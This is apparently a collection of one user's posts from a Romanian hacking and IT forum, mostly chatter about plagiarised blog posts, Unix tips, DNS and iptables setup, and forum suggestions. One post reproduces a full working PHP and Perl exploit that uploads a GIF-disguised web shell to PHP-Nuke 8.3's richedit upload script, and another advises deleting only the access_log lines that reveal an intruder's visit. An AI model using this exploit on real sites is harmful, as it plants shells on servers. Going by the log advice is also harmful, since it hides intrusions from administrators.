Zatarra

Uite aici, primele 2 pagini de articole: Copiate: http://blog.spargetot.ro/google-un-rival-pentru-facebook/ http://blog.spargetot.ro/numarul-utilizatorilor-de-internet-in-romania/ http://blog.spargetot.ro/japonezii-au-creat-un-calculator-cu-68-544-procesoare/ http://blog.spargetot.ro/laptop-sony-vaio-z/ http://blog.spargetot.ro/pozezi-acum-focalizezi-mai-tarziu/ http://blog.spargetot.ro/apple-ipad-2-va-fi-lansat-vineri-oficial-in-romania/ http://blog.spargetot.ro/incet-incet-o-sa-scapam-de-grija-driverelor/ http://blog.spargetot.ro/trabant-acoperit-cu-gazon/ http://blog.spargetot.ro/facebook-pierde-milioane-de-utilizatori/ http://blog.spargetot.ro/samsung-mai-tare-ca-nokia-si-apple-la-smartphone-uri/ http://blog.spargetot.ro/repeat-pe-youtube-la-nesfarsit/ http://blog.spargetot.ro/ios-5-te-poate-transforma-in-magician/ http://blog.spargetot.ro/urmatorul-playstation-portable-se-va-numi-ps-vita/ http://blog.spargetot.ro/se-copiaza-sau-nu-la-bacalaureat-2011/ http://blog.spargetot.ro/microsoft-a-prezentat-in-detaliu-sistemul-de-operare-windows-8-video/ http://blog.spargetot.ro/ce-tastatura-au-cei-de-la-cancan/ http://blog.spargetot.ro/patinoarul-flamaropol-va-fi-daramat/ http://blog.spargetot.ro/radiatiile-de-la-telefoanele-celulare-pot-cauza-cancerul/ http://blog.spargetot.ro/powermat-solutia-wireless-pentru-incarcarea-gadgeturilor-tale/ http://blog.spargetot.ro/apacer-lanseaza-stick-usb-3-0/ http://blog.spargetot.ro/verbatim-blu-ray-bd-r-tip-lth-de-25gb/ http://blog.spargetot.ro/se-lungesc-vacantele-scoala-nu-mai-incepe-pe-15-septembrie/ http://blog.spargetot.ro/asocierea-numarului-11-cu-atentatele-din-11-septembrie-2001/ http://blog.spargetot.ro/genius-ring-mouse-un-nou-mod-de-a-da-click/ http://blog.spargetot.ro/tableta-htc-flyer-este-disponibila-si-in-romania/Ale tale: http://blog.spargetot.ro/ce-o-sa-reziste-mult-si-bine-pe-internet/ http://blog.spargetot.ro/protectie-web-pentru-android-incepem-sa-avem-nevoie-de-asa-ceva/ http://blog.spargetot.ro/ce-poti-sa-patesti-daca-cumperi-hdd-din-targ/ http://blog.spargetot.ro/hahaha-fac-glume-cei-de-la-realitatea-net/Hai sa iti zic eu proverb: Imi e sila sa demonstrez oamenilor ca tine cat de penali sunt. Numai bine!

Voi nu stiti ce vorbiti.. vi e baza in tot ceea ce inseamna UNIX. Il gasesti in orice tip de shell, orice tip de UNIX, eu unul il ador. Are o groaza de scuraturi, pe care bineinteles, trebuie sa le stii si o groaza de avantaje. E adevarat ca la inceput iti da bataie de cap, dar daca sti sa te documentezi ii dai usor de cap. BTW: Threadu asta chiar sucks, si sucks rau.. comenzi aruncate asa la vrajeala.. sper sa nu se mai iveasca "hackerasi" de genul acesta.

Hai ca mai furi un telefon, un carucior de copii, dar rotile de la masina?

Te inseli, il foloseste pe cel care il ai tu setat default. Daca nu crezi incearca cu un script de genu asta: <?php echo $_SERVER['HTTP_USER_AGENT'] . "\n\n"; $browser = get_browser(null, true); print_r($browser); ?>

Salut si bun venit pe la noi. Dupa cum spunea si wildchild si eu te sfatuiesc sa pui orice fel de intrebare, trasnita sau nu, pe care o ai fara sa ai nici o retinere. Si da, este adevarat, pe forum avem si exemple 'asa nu' dar sunt si multi care au cunostinte vaste in anumite domenii si daca ai o problema te vor ajuta. Sper sa contribui si tu cu ce poti la comunitate, orice intiativa proprie e privita cu ochi buni.

Warning: curl_setopt() [function.curl-setopt]: Invalid curl configuration option in /home/net/public_html/*****/do_xss_scanner.php on line 121 Warning: curl_setopt() [function.curl-setopt]: Invalid curl configuration option in /home/net/public_html/*****/do_sqli_scanner.php on line 155 Inca mai ai bug`uri Edit: @pr00f ms, nu am observat Edit2: Voi chiar credeti ca sunt atat de genii baietii? eu cred ca`i mai usor sa decripteze hash`urile

Ui aici mindfuck:

E awsome, ar fi binevenita o schimbare a banner-ului, dar deocamdata zic sa se mai faca brainstorming pe ideea asta, poate se obtine ceva belea rau. P.S. ;-)

PHP exploit: <?php /////////////////////////////////////////////////// #Iranian Pentesters Home #PHP Nuke 8.3 MT AFU Vulnerability #Coded by:4n0nym0us & b3hz4d #http://www.pentesters.ir /////////////////////////////////////////////////// //Settings: $address = 'http://your-target.com'; $file = 'shell.php.01'; $prefix='pentesters_'; //Exploit: @$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"; @$file_data .= file_get_contents($file); file_put_contents($prefix . $file, $file_data); $file = $prefix . $file; echo "\n" . "///////////////////////////////////" ."\n"; echo " Iranian Pentesters Home" . "\n"; echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n"; echo "///////////////////////////////////" ."\n"; $address_c = $address . '/includes/richedit/upload.php'; $postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1"); $data = post_data($address_c, $postdata); $start = strpos($data, "<img src=\"upload"); if ($start != null) { $data = substr($data,$start + 10); $end = strpos($data, "\""); $data = substr($data,0,$end); echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n"; } else echo "\n" . "Upload Failed!!!"; function post_data($address, $data) { $curl = curl_init($address); curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)"); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); $content = curl_exec($curl); curl_close($curl); return $content; } ?> PERL exploit #!/usr/bin/perl ################################################### #//Iranian Pentesters Home #//PHP Nuke 8.3 MT AFU Vulnerability #//Coded by:4n0nym0us & b3hz4d #//http://www.pentesters.ir ################################################### use LWP; use HTTP::Request::Common; print "\n" . "///////////////////////////////////" ."\n"; print " Iranian Pentesters Home" . "\n"; print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n"; print "///////////////////////////////////" ."\n"; print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n"; my $url = $ARGV[0]."/includes/richedit/upload.php"; my $filename = $ARGV[1]; my $prefix = $ARGV[2]; my $rfile = $prefix . $filename . ".gif"; open fhandle, $ARGV[1] or die $!; while (<fhandle>){ $shell .= $_; } close fhandle; open fhandle, ">", $rfile or die $!; print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell; close(fhandle); my $ua = LWP::UserAgent->new; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026"); my $req = POST $url, Content_Type => 'form-data', Content => [ upload => "1", path => 'images', pwd => "1", userfile => [ $rfile,$prefix . $filename ] ]; my $res = $ua->request($req); $between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12); print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between); exit; Sursa: PHP Nuke 8.3 MT Shell Upload ? Packet Storm Video: Download - 213.mp4 - Persiangig

E buna ideea pentru un spread!

Done! Sper sa castige ;-)

Codex.. ce idee trasnita mi`ai dat.. MS.

A mea ii ceva de genu: mataigrasa sau i<3mata ? Guess it

Ok atunci hai sa iti explic unele chestii, poate inveti si tu ceva din ele: 1. Ai pus degeaba sudo in fata comenzii de dezarhivare. Atat timp cat descarci arhiva cu un user ea va fii creata cu permisiunile setate prin umask-ul userului respectiv. Astfel nu e nevoie sa mai dai sudo pentru dezarhivare. 2. O posibila problema ar putea fii permisiuniile fisierelor din arhiva, care sunt exact aceleasi cu cele din momentul arhivarii. Deci o comanda de chmod +x * ar rezolva problema 3. Acum sa iti explic cum sta treaba cu logurile: a) degeaba stergi .bash_history deoarece tu vei sterge toata istoria comenzilor executate PANA in momentul in care te-ai logat tu pe server. degeaba stergi .ksh_history si .csh_history deoarece tu nu vei folosi nici Korn shell nici C shell. c) degeaba stergi .bash_logout deoarece nici un server nu face script in fisierul de logout. d) sa nu mai spun ca multe din locatiile care le stergi tu cu comenzile respective nu exista. e) singura cheste relativ folositoare e sa stergi access_log-ul cum spui tu, in cazul in care intri pe interfata web, dar nici asta nu e indicata deoarece e o metoda foarte clara ca cineva a fost pe server, asadar o alternativa ar fii sa stergi doar rand-urile care dovedesc ca tu ai trecut p'acolo. 4. Ma bucur ca nu ai inceput sa injuri sau alte chestii de genul 5. Bafta si alta data mai cere si tu ajutorul in stanga si in dreapta cand vrei sa faci un tutorial si nu esti sigur pe el

1. De unde ai copiat prostia asta? 2. Unixcod-ul e vechi rau 3. Asa spusele comenzi de sters log-uri nu au nici o treaba cu ceea ce vorbesti tu aici 4. Sper sa nu mai postezi prostii asa mari iar daca o faci sa postezi macar ceva facut de tine in proportie de 100% 5. Primele 2 range-uri alea nu exista, exista doar o clasa de timp B cu un subnet mask de /16

E slab rau configu de Conky. Am sa postez eu zilele astea pe al meu de acasa ;-) sa vezi acolo config pericol fara frame-uri cum iti apare tie

La BOINC sunt in primi 50 de membrii din Romania (All Projects) sunt si membru activ din 2oo9. Recomand cu caldura pentru cei care doresc sa participe. Eu unul sunt cel mai activ aici: SETI@home

Stiu eu. Iti configurezi un server DNS si pui la primary dns ip`ul serverului tau. Restul configuratiei o declari in zona. Daca vrei sa iti functioneze din exterior trebuie neaparat sa ai setat la primary dns ip`u serverului tau de DNS, altfel nu iti va merge. Edit1: Trebuie sa mearga si cu route add, am uitat de varianta asta Edit2: a... da.. si iptables ;-) iptables -t nat -A PREROUTING -p tcp -d xx.xx.xx.xx --dport <port number> -j DNAT --to-destination yy.yy.yy.yy P.S. E Zatarra cu doi R

Do not miss.. In seara aceasta eclipsa totala de luna. Pentru mai multe detalii visit: Observatorul Astronomic „Amiral Vasile Urseanu” Eclips? total? de Lun? în noaptea de 15 spre 16 iunie 2011

Vi`l prezint pe Kabron la chitara cu o scurta istorioara Edit: @Un.Neuron poanta e ca trebuie sa stii umpic de engleza pentru a intelege ce se canta acolo

Kwe poate rezolvi si tu asta:

ReSpEcT si mersi, sper sa nu dezamagesc. Oricum functia e mai putin importanta, comunitatea face totul!

De multe ori am vazut chestia asta, as dori sa se implementeze o solutie pentru a se putea schimba titlul. Ori e bug, ori nu functioneaza, dar daca dau go advanced si modific titlul el ramane acelasi Mersi anticipat si sper sa se ia in considerare rugamintea Edit: Sa nu mai creez alt topic as dori sa va sugerez sa schimbati gif-ul asta cu unul mai sugestiv, sa inteleaga tot omul ca acolo se apasa cand doresti sa reportezi un post

@cifratorul am spus la faza cu scuze cum sta treaba Oricum am facut un tutorial cu scoaterea comment-urilor din surse in C/C++ Pentru tutorial click Here

La aia nu m`am gandit Sincer nu prea ai avea motive sa folosesti // sau /* in printf-uri sau in alte chestii de genu, cu toate ca ai dreptate, daca o functie contine // sau /* va sterge pana la capat sau pana la */, depinde de caz In tot anii mei de programare nu am folosit asa ceva, dar you never know ;-) cu toate ca repet e tare ilogic